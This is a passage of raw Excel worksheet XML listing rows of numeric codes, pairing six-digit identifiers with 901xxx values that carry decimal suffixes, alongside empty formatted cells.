      <c r="F6114" s="1"/>
      <c r="H6114" s="1"/>
    </row>
    <row r="6115" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6115" s="5">
        <v>700218</v>
      </c>
      <c r="B6115" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6115" s="5"/>
      <c r="E6115" s="3"/>
      <c r="F6115" s="1"/>
      <c r="H6115" s="1"/>
    </row>
    <row r="6116" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6116" s="5">
        <v>700218</v>
      </c>
      <c r="B6116" s="3">
        <v>901105</v>
      </c>
      <c r="D6116" s="5"/>
      <c r="E6116" s="3"/>
      <c r="F6116" s="1"/>
      <c r="H6116" s="1"/>
    </row>
    <row r="6117" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6117" s="5">
        <v>700218</v>
      </c>
      <c r="B6117" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D6117" s="5"/>
      <c r="E6117" s="3"/>
      <c r="F6117" s="1"/>
      <c r="H6117" s="1"/>
    </row>
    <row r="6118" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6118" s="5">
        <v>700218</v>
      </c>
      <c r="B6118" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D6118" s="5"/>
      <c r="E6118" s="3"/>
      <c r="F6118" s="1"/>
      <c r="H6118" s="1"/>
    </row>
    <row r="6119" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6119" s="5">
        <v>700218</v>
      </c>
      <c r="B6119" s="3">
        <v>901036.005</v>
      </c>
      <c r="D6119" s="5"/>
      <c r="E6119" s="3"/>
      <c r="F6119" s="1"/>
      <c r="H6119" s="1"/>
    </row>
    <row r="6120" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6120" s="5">
        <v>700218</v>
      </c>
      <c r="B6120" s="3">
        <v>901112</v>
      </c>
      <c r="D6120" s="5"/>
      <c r="E6120" s="3"/>
      <c r="F6120" s="1"/>
      <c r="H6120" s="1"/>
    </row>
    <row r="6121" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6121" s="5">
        <v>700218</v>
      </c>
      <c r="B6121" s="3">
        <v>901057</v>
      </c>
      <c r="D6121" s="5"/>
      <c r="E6121" s="3"/>
      <c r="F6121" s="1"/>
      <c r="H6121" s="1"/>
    </row>
    <row r="6122" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6122" s="5">
        <v>700218</v>
      </c>
      <c r="B6122" s="3">
        <v>901055</v>
      </c>
      <c r="D6122" s="5"/>
      <c r="E6122" s="3"/>
      <c r="F6122" s="1"/>
      <c r="H6122" s="1"/>
    </row>
    <row r="6123" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6123" s="5">
        <v>700218</v>
      </c>
      <c r="B6123" s="3">
        <v>901113</v>
      </c>
      <c r="D6123" s="5"/>
      <c r="E6123" s="3"/>
      <c r="F6123" s="1"/>
      <c r="H6123" s="1"/>
    </row>
    <row r="6124" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6124" s="5">
        <v>700218</v>
      </c>
      <c r="B6124" s="3">
        <v>901489</v>
      </c>
      <c r="D6124" s="5"/>
      <c r="E6124" s="3"/>
      <c r="F6124" s="1"/>
      <c r="H6124" s="1"/>
    </row>
    <row r="6125" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6125" s="5">
        <v>700218</v>
      </c>
      <c r="B6125" s="3">
        <v>901082</v>
      </c>
      <c r="D6125" s="5"/>
      <c r="E6125" s="3"/>
      <c r="F6125" s="1"/>
      <c r="H6125" s="1"/>
    </row>
    <row r="6126" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6126" s="5">
        <v>700218</v>
      </c>
      <c r="B6126" s="3">
        <v>901049</v>
      </c>
      <c r="D6126" s="5"/>
      <c r="E6126" s="3"/>
      <c r="F6126" s="1"/>
      <c r="H6126" s="1"/>
    </row>
    <row r="6127" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6127" s="5">
        <v>700218</v>
      </c>
      <c r="B6127" s="3">
        <v>901033</v>
      </c>
      <c r="D6127" s="5"/>
      <c r="E6127" s="3"/>
      <c r="F6127" s="1"/>
      <c r="H6127" s="1"/>
    </row>
    <row r="6128" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6128" s="5">
        <v>700218</v>
      </c>
      <c r="B6128" s="3">
        <v>901007</v>
      </c>
      <c r="D6128" s="5"/>
      <c r="E6128" s="3"/>
      <c r="F6128" s="1"/>
      <c r="H6128" s="1"/>
    </row>
    <row r="6129" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6129" s="5">
        <v>700218</v>
      </c>
      <c r="B6129" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D6129" s="5"/>
      <c r="E6129" s="3"/>
      <c r="F6129" s="1"/>
      <c r="H6129" s="1"/>
    </row>
    <row r="6130" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6130" s="5">
        <v>700226</v>
      </c>
      <c r="B6130" s="3">
        <v>901082</v>
      </c>
      <c r="D6130" s="5"/>
      <c r="E6130" s="3"/>
      <c r="F6130" s="1"/>
      <c r="H6130" s="1"/>
    </row>
    <row r="6131" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6131" s="5">
        <v>700226</v>
      </c>
      <c r="B6131" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D6131" s="5"/>
      <c r="E6131" s="3"/>
      <c r="F6131" s="1"/>
      <c r="H6131" s="1"/>
    </row>
    <row r="6132" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6132" s="5">
        <v>700226</v>
      </c>
      <c r="B6132" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6132" s="5"/>
      <c r="E6132" s="3"/>
      <c r="F6132" s="1"/>
      <c r="H6132" s="1"/>
    </row>
    <row r="6133" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6133" s="5">
        <v>700226</v>
      </c>
      <c r="B6133" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6133" s="5"/>
      <c r="E6133" s="3"/>
      <c r="F6133" s="1"/>
      <c r="H6133" s="1"/>
    </row>
    <row r="6134" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6134" s="5">
        <v>700226</v>
      </c>
      <c r="B6134" s="3">
        <v>901059.005</v>
      </c>
      <c r="D6134" s="5"/>
      <c r="E6134" s="3"/>
      <c r="F6134" s="1"/>
      <c r="H6134" s="1"/>
    </row>
    <row r="6135" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6135" s="5">
        <v>700226</v>
      </c>
      <c r="B6135" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D6135" s="5"/>
      <c r="E6135" s="3"/>
      <c r="F6135" s="1"/>
      <c r="H6135" s="1"/>
    </row>
    <row r="6136" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6136" s="5">
        <v>700226</v>
      </c>
      <c r="B6136" s="3">
        <v>901140</v>
      </c>
      <c r="D6136" s="5"/>
      <c r="E6136" s="3"/>
      <c r="F6136" s="1"/>
      <c r="H6136" s="1"/>
    </row>
    <row r="6137" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6137" s="5">
        <v>700226</v>
      </c>
      <c r="B6137" s="3">
        <v>901114.00100000005</v>
      </c>
      <c r="D6137" s="5"/>
      <c r="E6137" s="3"/>
      <c r="F6137" s="1"/>
      <c r="H6137" s="1"/>
    </row>
    <row r="6138" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6138" s="5">
        <v>700226</v>
      </c>
      <c r="B6138" s="3">
        <v>901083</v>
      </c>
      <c r="D6138" s="5"/>
      <c r="E6138" s="3"/>
      <c r="F6138" s="1"/>
      <c r="H6138" s="1"/>
    </row>
    <row r="6139" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6139" s="5">
        <v>700226</v>
      </c>
      <c r="B6139" s="3">
        <v>901105</v>
      </c>
      <c r="D6139" s="5"/>
      <c r="E6139" s="3"/>
      <c r="F6139" s="1"/>
      <c r="H6139" s="1"/>
    </row>
    <row r="6140" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6140" s="5">
        <v>700226</v>
      </c>
      <c r="B6140" s="3">
        <v>901027</v>
      </c>
      <c r="D6140" s="5"/>
      <c r="E6140" s="3"/>
      <c r="F6140" s="1"/>
      <c r="H6140" s="1"/>
    </row>
    <row r="6141" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6141" s="5">
        <v>700226</v>
      </c>
      <c r="B6141" s="3">
        <v>901055</v>
      </c>
      <c r="D6141" s="5"/>
      <c r="E6141" s="3"/>
      <c r="F6141" s="1"/>
      <c r="H6141" s="1"/>
    </row>
    <row r="6142" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6142" s="5">
        <v>700226</v>
      </c>
      <c r="B6142" s="3">
        <v>901055.01199999999</v>
      </c>
      <c r="D6142" s="5"/>
      <c r="E6142" s="3"/>
      <c r="F6142" s="1"/>
      <c r="H6142" s="1"/>
    </row>
    <row r="6143" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6143" s="5">
        <v>700226</v>
      </c>
      <c r="B6143" s="3">
        <v>901053.00199999998</v>
      </c>
      <c r="D6143" s="5"/>
      <c r="E6143" s="3"/>
      <c r="F6143" s="1"/>
      <c r="H6143" s="1"/>
    </row>
    <row r="6144" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6144" s="5">
        <v>700226</v>
      </c>
      <c r="B6144" s="3">
        <v>901552.00100000005</v>
      </c>
      <c r="D6144" s="5"/>
      <c r="E6144" s="3"/>
      <c r="F6144" s="1"/>
      <c r="H6144" s="1"/>
    </row>
    <row r="6145" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6145" s="5">
        <v>700226</v>
      </c>
      <c r="B6145" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D6145" s="5"/>
      <c r="E6145" s="3"/>
      <c r="F6145" s="1"/>
      <c r="H6145" s="1"/>
    </row>
    <row r="6146" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6146" s="5">
        <v>700649</v>
      </c>
      <c r="B6146" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D6146" s="5"/>
      <c r="E6146" s="3"/>
      <c r="F6146" s="1"/>
      <c r="H6146" s="1"/>
    </row>
    <row r="6147" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6147" s="5">
        <v>700649</v>
      </c>
      <c r="B6147" s="3">
        <v>901098</v>
      </c>
      <c r="D6147" s="5"/>
      <c r="E6147" s="3"/>
      <c r="F6147" s="1"/>
      <c r="H6147" s="1"/>
    </row>
    <row r="6148" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6148" s="5">
        <v>700649</v>
      </c>
      <c r="B6148" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6148" s="5"/>
      <c r="E6148" s="3"/>
      <c r="F6148" s="1"/>
      <c r="H6148" s="1"/>
    </row>
    <row r="6149" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6149" s="5">
        <v>700649</v>
      </c>
      <c r="B6149" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6149" s="5"/>
      <c r="E6149" s="3"/>
      <c r="F6149" s="1"/>
      <c r="H6149" s="1"/>
    </row>
    <row r="6150" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6150" s="5">
        <v>700649</v>
      </c>
      <c r="B6150" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D6150" s="5"/>
      <c r="E6150" s="3"/>
      <c r="F6150" s="1"/>
      <c r="H6150" s="1"/>
    </row>
    <row r="6151" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6151" s="5">
        <v>700649</v>
      </c>
      <c r="B6151" s="3">
        <v>901136.00100000005</v>
      </c>
      <c r="D6151" s="5"/>
      <c r="E6151" s="3"/>
      <c r="F6151" s="1"/>
      <c r="H6151" s="1"/>
    </row>
    <row r="6152" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6152" s="5">
        <v>700649</v>
      </c>
      <c r="B6152" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D6152" s="5"/>
      <c r="E6152" s="3"/>
      <c r="F6152" s="1"/>
      <c r="H6152" s="1"/>
    </row>
    <row r="6153" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6153" s="5">
        <v>700649</v>
      </c>
      <c r="B6153" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D6153" s="5"/>
      <c r="E6153" s="3"/>
      <c r="F6153" s="1"/>
      <c r="H6153" s="1"/>
    </row>
    <row r="6154" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6154" s="5">
        <v>700649</v>
      </c>
      <c r="B6154" s="3">
        <v>901041</v>
      </c>
      <c r="D6154" s="5"/>
      <c r="E6154" s="3"/>
      <c r="F6154" s="1"/>
      <c r="H6154" s="1"/>
    </row>
    <row r="6155" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6155" s="5">
        <v>700649</v>
      </c>
      <c r="B6155" s="3">
        <v>901564.00199999998</v>
      </c>
      <c r="D6155" s="5"/>
      <c r="E6155" s="3"/>
      <c r="F6155" s="1"/>
      <c r="H6155" s="1"/>
    </row>
    <row r="6156" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6156" s="5">
        <v>700649</v>
      </c>
      <c r="B6156" s="3">
        <v>901105</v>
      </c>
      <c r="D6156" s="5"/>
      <c r="E6156" s="3"/>
      <c r="F6156" s="1"/>
      <c r="H6156" s="1"/>
    </row>
    <row r="6157" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6157" s="5">
        <v>700649</v>
      </c>
      <c r="B6157" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D6157" s="5"/>
      <c r="E6157" s="3"/>
      <c r="F6157" s="1"/>
      <c r="H6157" s="1"/>
    </row>
    <row r="6158" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6158" s="5">
        <v>700649</v>
      </c>
      <c r="B6158" s="3">
        <v>901112</v>
      </c>
      <c r="D6158" s="5"/>
      <c r="E6158" s="3"/>
      <c r="F6158" s="1"/>
      <c r="H6158" s="1"/>
    </row>
    <row r="6159" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6159" s="5">
        <v>700649</v>
      </c>
      <c r="B6159" s="3">
        <v>901027</v>
      </c>
      <c r="D6159" s="5"/>
      <c r="E6159" s="3"/>
      <c r="F6159" s="1"/>
      <c r="H6159" s="1"/>
    </row>
    <row r="6160" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6160" s="5">
        <v>700649</v>
      </c>
      <c r="B6160" s="3">
        <v>901598.00300000003</v>
      </c>
      <c r="D6160" s="5"/>
      <c r="E6160" s="3"/>
      <c r="F6160" s="1"/>
      <c r="H6160" s="1"/>
    </row>
    <row r="6161" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6161" s="5">
        <v>700649</v>
      </c>
      <c r="B6161" s="3">
        <v>901090.00399999996</v>
      </c>
      <c r="D6161" s="5"/>
      <c r="E6161" s="3"/>
      <c r="F6161" s="1"/>
      <c r="H6161" s="1"/>
    </row>
    <row r="6162" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6162" s="5">
        <v>700649</v>
      </c>
      <c r="B6162" s="3">
        <v>901113</v>
      </c>
      <c r="D6162" s="5"/>
      <c r="E6162" s="3"/>
      <c r="F6162" s="1"/>
      <c r="H6162" s="1"/>
    </row>
    <row r="6163" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6163" s="5">
        <v>700649</v>
      </c>
      <c r="B6163" s="3">
        <v>901082</v>
      </c>
      <c r="D6163" s="5"/>
      <c r="E6163" s="3"/>
      <c r="F6163" s="1"/>
      <c r="H6163" s="1"/>
    </row>
    <row r="6164" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6164" s="5">
        <v>700649</v>
      </c>
      <c r="B6164" s="3">
        <v>901033</v>
      </c>
      <c r="D6164" s="5"/>
      <c r="E6164" s="3"/>
      <c r="F6164" s="1"/>
      <c r="H6164" s="1"/>
    </row>
    <row r="6165" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6165" s="5">
        <v>700649</v>
      </c>
      <c r="B6165" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D6165" s="5"/>
      <c r="E6165" s="3"/>
      <c r="F6165" s="1"/>
      <c r="H6165" s="1"/>
    </row>
    <row r="6166" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6166" s="5">
        <v>700649</v>
      </c>
      <c r="B6166" s="3">
        <v>901102</v>
      </c>
      <c r="D6166" s="5"/>
      <c r="E6166" s="3"/>
      <c r="F6166" s="1"/>
      <c r="H6166" s="1"/>
    </row>
    <row r="6167" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6167" s="5">
        <v>700159</v>
      </c>
      <c r="B6167" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6167" s="5"/>
      <c r="E6167" s="3"/>
      <c r="F6167" s="1"/>
      <c r="H6167" s="1"/>
    </row>
    <row r="6168" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6168" s="5">
        <v>700159</v>
      </c>
      <c r="B6168" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6168" s="5"/>
      <c r="E6168" s="3"/>
      <c r="F6168" s="1"/>
      <c r="H6168" s="1"/>
    </row>
    <row r="6169" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6169" s="5">
        <v>700159</v>
      </c>
      <c r="B6169" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6169" s="5"/>
      <c r="E6169" s="3"/>
      <c r="F6169" s="1"/>
      <c r="H6169" s="1"/>
    </row>
    <row r="6170" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6170" s="5">
        <v>700159</v>
      </c>
      <c r="B6170" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D6170" s="5"/>
      <c r="E6170" s="3"/>
      <c r="F6170" s="1"/>
      <c r="H6170" s="1"/>
    </row>
    <row r="6171" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6171" s="5">
        <v>700273</v>
      </c>
      <c r="B6171" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D6171" s="5"/>
      <c r="E6171" s="3"/>
      <c r="F6171" s="1"/>
      <c r="H6171" s="1"/>
    </row>
    <row r="6172" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6172" s="5">
        <v>700273</v>
      </c>
      <c r="B6172" s="3">
        <v>901057</v>
      </c>
      <c r="D6172" s="5"/>
      <c r="E6172" s="3"/>
      <c r="F6172" s="1"/>
      <c r="H6172" s="1"/>
    </row>
    <row r="6173" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6173" s="5">
        <v>700273</v>
      </c>
      <c r="B6173" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D6173" s="5"/>
      <c r="E6173" s="3"/>
      <c r="F6173" s="1"/>
      <c r="H6173" s="1"/>
    </row>
    <row r="6174" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6174" s="5">
        <v>700273</v>
      </c>
      <c r="B6174" s="3">
        <v>901090</v>
      </c>
      <c r="D6174" s="5"/>
      <c r="E6174" s="3"/>
      <c r="F6174" s="1"/>
      <c r="H6174" s="1"/>
    </row>
    <row r="6175" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6175" s="5">
        <v>700273</v>
      </c>
      <c r="B6175" s="3">
        <v>901113</v>
      </c>
      <c r="D6175" s="5"/>
      <c r="E6175" s="3"/>
      <c r="F6175" s="1"/>
      <c r="H6175" s="1"/>
    </row>
    <row r="6176" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6176" s="5">
        <v>700627</v>
      </c>
      <c r="B6176" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D6176" s="5"/>
      <c r="E6176" s="3"/>
      <c r="F6176" s="1"/>
      <c r="H6176" s="1"/>
    </row>
    <row r="6177" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6177" s="5">
        <v>700627</v>
      </c>
      <c r="B6177" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D6177" s="5"/>
      <c r="E6177" s="3"/>
      <c r="F6177" s="1"/>
      <c r="H6177" s="1"/>
    </row>
    <row r="6178" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6178" s="5">
        <v>700627</v>
      </c>
      <c r="B6178" s="3">
        <v>901105</v>
      </c>
      <c r="D6178" s="5"/>
      <c r="E6178" s="3"/>
      <c r="F6178" s="1"/>
      <c r="H6178" s="1"/>
    </row>
    <row r="6179" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6179" s="5">
        <v>700627</v>
      </c>
      <c r="B6179" s="3">
        <v>901106</v>
      </c>
      <c r="D6179" s="5"/>
      <c r="E6179" s="3"/>
      <c r="F6179" s="1"/>
      <c r="H6179" s="1"/>
    </row>
    <row r="6180" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6180" s="5">
        <v>700627</v>
      </c>
      <c r="B6180" s="3">
        <v>901027</v>
      </c>
      <c r="D6180" s="5"/>
      <c r="E6180" s="3"/>
      <c r="F6180" s="1"/>
      <c r="H6180" s="1"/>
    </row>
    <row r="6181" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6181" s="5">
        <v>700627</v>
      </c>
      <c r="B6181" s="3">
        <v>901057</v>
      </c>
      <c r="D6181" s="5"/>
      <c r="E6181" s="3"/>
      <c r="F6181" s="1"/>
      <c r="H6181" s="1"/>
    </row>
    <row r="6182" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6182" s="5">
        <v>700627</v>
      </c>
      <c r="B6182" s="3">
        <v>901012</v>
      </c>
      <c r="D6182" s="5"/>
      <c r="E6182" s="3"/>
      <c r="F6182" s="1"/>
      <c r="H6182" s="1"/>
    </row>
    <row r="6183" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6183" s="5">
        <v>700627</v>
      </c>
      <c r="B6183" s="3">
        <v>901082</v>
      </c>
      <c r="D6183" s="5"/>
      <c r="E6183" s="3"/>
      <c r="F6183" s="1"/>
      <c r="H6183" s="1"/>
    </row>
    <row r="6184" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6184" s="5">
        <v>700627</v>
      </c>
      <c r="B6184" s="3">
        <v>901033</v>
      </c>
      <c r="D6184" s="5"/>
      <c r="E6184" s="3"/>
      <c r="F6184" s="1"/>
      <c r="H6184" s="1"/>
    </row>
    <row r="6185" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6185" s="5">
        <v>700627</v>
      </c>
      <c r="B6185" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D6185" s="5"/>
      <c r="E6185" s="3"/>
      <c r="F6185" s="1"/>
      <c r="H6185" s="1"/>
    </row>
    <row r="6186" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6186" s="5">
        <v>700627</v>
      </c>
      <c r="B6186" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D6186" s="5"/>
      <c r="E6186" s="3"/>
      <c r="F6186" s="1"/>
      <c r="H6186" s="1"/>
    </row>
    <row r="6187" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6187" s="5">
        <v>700615</v>
      </c>
      <c r="B6187" s="3">
        <v>901071.00399999996</v>
      </c>
      <c r="D6187" s="5"/>
      <c r="E6187" s="3"/>
      <c r="F6187" s="1"/>
      <c r="H6187" s="1"/>
    </row>
    <row r="6188" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6188" s="5">
        <v>700615</v>
      </c>
      <c r="B6188" s="3">
        <v>901005</v>
      </c>
      <c r="D6188" s="5"/>
      <c r="E6188" s="3"/>
      <c r="F6188" s="1"/>
      <c r="H6188" s="1"/>
    </row>
    <row r="6189" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6189" s="5">
        <v>700615</v>
      </c>
      <c r="B6189" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D6189" s="5"/>
      <c r="E6189" s="3"/>
      <c r="F6189" s="1"/>
      <c r="H6189" s="1"/>
    </row>
    <row r="6190" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6190" s="5">
        <v>700615</v>
      </c>
      <c r="B6190" s="3">
        <v>901140</v>
      </c>
      <c r="D6190" s="5"/>
      <c r="E6190" s="3"/>
      <c r="F6190" s="1"/>
      <c r="H6190" s="1"/>
    </row>
    <row r="6191" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6191" s="5">
        <v>700615</v>
      </c>
      <c r="B6191" s="3">
        <v>901568.00199999998</v>
      </c>
      <c r="D6191" s="5"/>
      <c r="E6191" s="3"/>
      <c r="F6191" s="1"/>
      <c r="H6191" s="1"/>
    </row>
    <row r="6192" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6192" s="5">
        <v>700615</v>
      </c>
      <c r="B6192" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D6192" s="5"/>
      <c r="E6192" s="3"/>
      <c r="F6192" s="1"/>
      <c r="H6192" s="1"/>
    </row>
    <row r="6193" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6193" s="5">
        <v>700615</v>
      </c>
      <c r="B6193" s="3">
        <v>901083</v>
      </c>
      <c r="D6193" s="5"/>
      <c r="E6193" s="3"/>
      <c r="F6193" s="1"/>
      <c r="H6193" s="1"/>
    </row>
    <row r="6194" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6194" s="5">
        <v>700615</v>
      </c>
      <c r="B6194" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6194" s="5"/>
      <c r="E6194" s="3"/>
      <c r="F6194" s="1"/>
      <c r="H6194" s="1"/>
    </row>
    <row r="6195" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6195" s="5">
        <v>700615</v>
      </c>
      <c r="B6195" s="3">
        <v>901105</v>
      </c>
      <c r="D6195" s="5"/>
      <c r="E6195" s="3"/>
      <c r="F6195" s="1"/>
      <c r="H6195" s="1"/>
    </row>
    <row r="6196" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6196" s="5">
        <v>700615</v>
      </c>
      <c r="B6196" s="3">
        <v>901036</v>
      </c>
      <c r="D6196" s="5"/>
      <c r="E6196" s="3"/>
      <c r="F6196" s="1"/>
      <c r="H6196" s="1"/>
    </row>
    <row r="6197" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6197" s="5">
        <v>700615</v>
      </c>
      <c r="B6197" s="3">
        <v>901106</v>
      </c>
      <c r="D6197" s="5"/>
      <c r="E6197" s="3"/>
      <c r="F6197" s="1"/>
      <c r="H6197" s="1"/>
    </row>
    <row r="6198" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6198" s="5">
        <v>700615</v>
      </c>
      <c r="B6198" s="3">
        <v>901095</v>
      </c>
      <c r="D6198" s="5"/>
      <c r="E6198" s="3"/>
      <c r="F6198" s="1"/>
      <c r="H6198" s="1"/>
    </row>
    <row r="6199" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6199" s="5">
        <v>700615</v>
      </c>
      <c r="B6199" s="3">
        <v>901027</v>
      </c>
      <c r="D6199" s="5"/>
      <c r="E6199" s="3"/>
      <c r="F6199" s="1"/>
      <c r="H6199" s="1"/>
    </row>
    <row r="6200" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6200" s="5">
        <v>700615</v>
      </c>
      <c r="B6200" s="3">
        <v>901057</v>
      </c>
      <c r="D6200" s="5"/>
      <c r="E6200" s="3"/>
      <c r="F6200" s="1"/>
      <c r="H6200" s="1"/>
    </row>
    <row r="6201" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6201" s="5">
        <v>700615</v>
      </c>
      <c r="B6201" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D6201" s="5"/>
      <c r="E6201" s="3"/>
      <c r="F6201" s="1"/>
      <c r="H6201" s="1"/>
    </row>
    <row r="6202" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6202" s="5">
        <v>700615</v>
      </c>
      <c r="B6202" s="3">
        <v>901090</v>
      </c>
      <c r="D6202" s="5"/>
      <c r="E6202" s="3"/>
      <c r="F6202" s="1"/>
      <c r="H6202" s="1"/>
    </row>
    <row r="6203" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6203" s="5">
        <v>700615</v>
      </c>
      <c r="B6203" s="3">
        <v>901082</v>
      </c>
      <c r="D6203" s="5"/>
      <c r="E6203" s="3"/>
      <c r="F6203" s="1"/>
      <c r="H6203" s="1"/>
    </row>
    <row r="6204" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6204" s="5">
        <v>700615</v>
      </c>
      <c r="B6204" s="3">
        <v>901033</v>
      </c>
      <c r="D6204" s="5"/>
      <c r="E6204" s="3"/>
      <c r="F6204" s="1"/>
      <c r="H6204" s="1"/>
    </row>
    <row r="6205" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6205" s="5">
        <v>700615</v>
      </c>
      <c r="B6205" s="3">
        <v>901007</v>
      </c>
      <c r="D6205" s="5"/>
      <c r="E6205" s="3"/>
      <c r="F6205" s="1"/>
      <c r="H6205" s="1"/>
    </row>
    <row r="6206" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6206" s="5">
        <v>700615</v>
      </c>
      <c r="B6206" s="3">
        <v>901124</v>
      </c>
      <c r="D6206" s="5"/>
      <c r="E6206" s="3"/>
      <c r="F6206" s="1"/>
      <c r="H6206" s="1"/>
    </row>
    <row r="6207" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6207" s="5">
        <v>700516</v>
      </c>
      <c r="B6207" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D6207" s="5"/>
      <c r="E6207" s="3"/>
      <c r="F6207" s="1"/>
      <c r="H6207" s="1"/>
    </row>
    <row r="6208" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6208" s="5">
        <v>700516</v>
